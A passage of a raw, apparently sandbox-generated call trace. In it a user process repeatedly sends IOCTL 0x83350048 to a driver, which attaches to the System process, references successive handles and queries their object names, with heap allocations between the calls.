hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.800] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.800] PsAcquireProcessExitSynchronization () returned 0x0 [0240.800] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.800] ObReferenceObjectByHandle (in: Handle=0xffffffff800005fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a75f20, HandleInformation=0x0) returned 0x0 [0240.800] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.800] PsReleaseProcessExitSynchronization () returned 0x2 [0240.800] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.800] ObQueryNameString (in: Object=0xfffffa8003a75f20, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.800] ObfDereferenceObject (Object=0xfffffa8003a75f20) returned 0x2 [0240.800] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.801] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.801] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.801] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.801] PsAcquireProcessExitSynchronization () returned 0x0 [0240.801] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.801] ObReferenceObjectByHandle (in: Handle=0xffffffff80000600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f95980, HandleInformation=0x0) returned 0x0 [0240.801] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.801] PsReleaseProcessExitSynchronization () returned 0x2 [0240.801] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.801] ObQueryNameString (in: Object=0xfffffa8001f95980, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.801] ObfDereferenceObject (Object=0xfffffa8001f95980) returned 0x2 [0240.801] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.801] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.801] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.802] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.802] PsAcquireProcessExitSynchronization () returned 0x0 [0240.802] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.802] ObReferenceObjectByHandle (in: Handle=0xffffffff80000604, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed6200, HandleInformation=0x0) returned 0x0 [0240.802] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.802] PsReleaseProcessExitSynchronization () returned 0x2 [0240.802] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.802] ObQueryNameString (in: Object=0xfffffa8001ed6200, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.802] ObfDereferenceObject (Object=0xfffffa8001ed6200) returned 0x2 [0240.802] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.802] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.802] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.802] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.802] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.802] PsAcquireProcessExitSynchronization () returned 0x0 [0240.802] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.802] ObReferenceObjectByHandle (in: Handle=0xffffffff80000608, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f932f0, HandleInformation=0x0) returned 0x0 [0240.802] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.802] PsReleaseProcessExitSynchronization () returned 0x2 [0240.802] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.802] ObQueryNameString (in: Object=0xfffffa8001f932f0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.802] ObfDereferenceObject (Object=0xfffffa8001f932f0) returned 0x2 [0240.803] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.803] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.803] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.803] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.803] PsAcquireProcessExitSynchronization () returned 0x0 [0240.803] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.803] ObReferenceObjectByHandle (in: Handle=0xffffffff80000610, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f948b0, HandleInformation=0x0) returned 0x0 [0240.803] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.803] PsReleaseProcessExitSynchronization () returned 0x2 [0240.803] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.803] ObQueryNameString (in: Object=0xfffffa8001f948b0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.803] ObfDereferenceObject (Object=0xfffffa8001f948b0) returned 0x2 [0240.803] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.803] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.803] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.803] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.803] PsAcquireProcessExitSynchronization () returned 0x0 [0240.803] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.804] ObReferenceObjectByHandle (in: Handle=0xffffffff80000614, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed6890, HandleInformation=0x0) returned 0x0 [0240.804] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.804] PsReleaseProcessExitSynchronization () returned 0x2 [0240.804] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.804] ObQueryNameString (in: Object=0xfffffa8001ed6890, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.804] ObfDereferenceObject (Object=0xfffffa8001ed6890) returned 0x2 [0240.804] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.804] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.804] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.804] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.804] PsAcquireProcessExitSynchronization () returned 0x0 [0240.804] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.804] ObReferenceObjectByHandle (in: Handle=0xffffffff80000618, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f93d20, HandleInformation=0x0) returned 0x0 [0240.804] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.804] PsReleaseProcessExitSynchronization () returned 0x2 [0240.804] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.804] ObQueryNameString (in: Object=0xfffffa8001f93d20, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.804] ObfDereferenceObject (Object=0xfffffa8001f93d20) returned 0x2 [0240.804] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.804] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.805] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.805] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.805] PsAcquireProcessExitSynchronization () returned 0x0 [0240.805] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.805] ObReferenceObjectByHandle (in: Handle=0xffffffff8000061c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039179a0, HandleInformation=0x0) returned 0x0 [0240.805] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.805] PsReleaseProcessExitSynchronization () returned 0x2 [0240.805] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.805] ObQueryNameString (in: Object=0xfffffa80039179a0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.805] ObfDereferenceObject (Object=0xfffffa80039179a0) returned 0x2 [0240.805] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.805] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.805] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.805] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.805] PsAcquireProcessExitSynchronization () returned 0x0 [0240.805] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.805] ObReferenceObjectByHandle (in: Handle=0xffffffff80000620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f93780, HandleInformation=0x0) returned 0x0 [0240.805] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.805] PsReleaseProcessExitSynchronization () returned 0x2 [0240.805] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.806] ObQueryNameString (in: Object=0xfffffa8001f93780, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.806] ObfDereferenceObject (Object=0xfffffa8001f93780) returned 0x2 [0240.806] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.806] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.806] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.806] PsAcquireProcessExitSynchronization () returned 0x0 [0240.806] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.806] ObReferenceObjectByHandle (in: Handle=0xffffffff80000624, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed6f20, HandleInformation=0x0) returned 0x0 [0240.806] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.806] PsReleaseProcessExitSynchronization () returned 0x2 [0240.806] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.806] ObQueryNameString (in: Object=0xfffffa8001ed6f20, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.806] ObfDereferenceObject (Object=0xfffffa8001ed6f20) returned 0x2 [0240.806] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.806] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.806] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.806] PsAcquireProcessExitSynchronization () returned 0x0 [0240.806] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.806] ObReferenceObjectByHandle (in: Handle=0xffffffff80000628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f91350, HandleInformation=0x0) returned 0x0 [0240.806] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.806] PsReleaseProcessExitSynchronization () returned 0x2 [0240.806] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.807] ObQueryNameString (in: Object=0xfffffa8001f91350, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.807] ObfDereferenceObject (Object=0xfffffa8001f91350) returned 0x2 [0240.807] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.807] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.807] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.807] PsAcquireProcessExitSynchronization () returned 0x0 [0240.807] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.807] ObReferenceObjectByHandle (in: Handle=0xffffffff80000630, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f92680, HandleInformation=0x0) returned 0x0 [0240.807] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.807] PsReleaseProcessExitSynchronization () returned 0x2 [0240.807] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.807] ObQueryNameString (in: Object=0xfffffa8001f92680, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.807] ObfDereferenceObject (Object=0xfffffa8001f92680) returned 0x2 [0240.807] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.807] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.807] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.807] PsAcquireProcessExitSynchronization () returned 0x0 [0240.807] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.807] ObReferenceObjectByHandle (in: Handle=0xffffffff80000634, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed57c0, HandleInformation=0x0) returned 0x0 [0240.807] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.807] PsReleaseProcessExitSynchronization () returned 0x2 [0240.807] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.807] ObQueryNameString (in: Object=0xfffffa8001ed57c0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.808] ObfDereferenceObject (Object=0xfffffa8001ed57c0) returned 0x2 [0240.808] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.808] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.808] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.808] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.808] PsAcquireProcessExitSynchronization () returned 0x0 [0240.808] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.808] ObReferenceObjectByHandle (in: Handle=0xffffffff80000638, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f91af0, HandleInformation=0x0) returned 0x0 [0240.808] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.808] PsReleaseProcessExitSynchronization () returned 0x2 [0240.808] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.808] ObQueryNameString (in: Object=0xfffffa8001f91af0, ObjectNameInfo=0xfffffa8003131044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003131044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.808] ObfDereferenceObject (Object=0xfffffa8001f91af0) returned 0x2 [0240.808] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.808] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.808] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.808] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.808] PsAcquireProcessExitSynchronization () returned 0x0 [0240.809] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.809] ObReferenceObjectByHandle (in: Handle=0xffffffff8000063c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a4ebc0, HandleInformation=0x0) returned 0x0 [0240.809] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.809] PsReleaseProcessExitSynchronization () returned 0x2 [0240.809] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.809] ObQueryNameString (in: Object=0xfffffa8003a4ebc0, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.809] ObfDereferenceObject (Object=0xfffffa8003a4ebc0) returned 0x2 [0240.809] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.809] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.809] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, 